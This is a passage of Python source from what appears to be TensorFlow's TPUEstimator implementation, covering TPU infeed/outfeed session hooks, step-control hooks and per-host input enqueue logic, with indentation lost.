iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tf.compat.v1.tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx, features, labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with tf.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(
'Missing or extra enqueue_data for host {}. len(enqueue_data) = {}.'
.format(host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
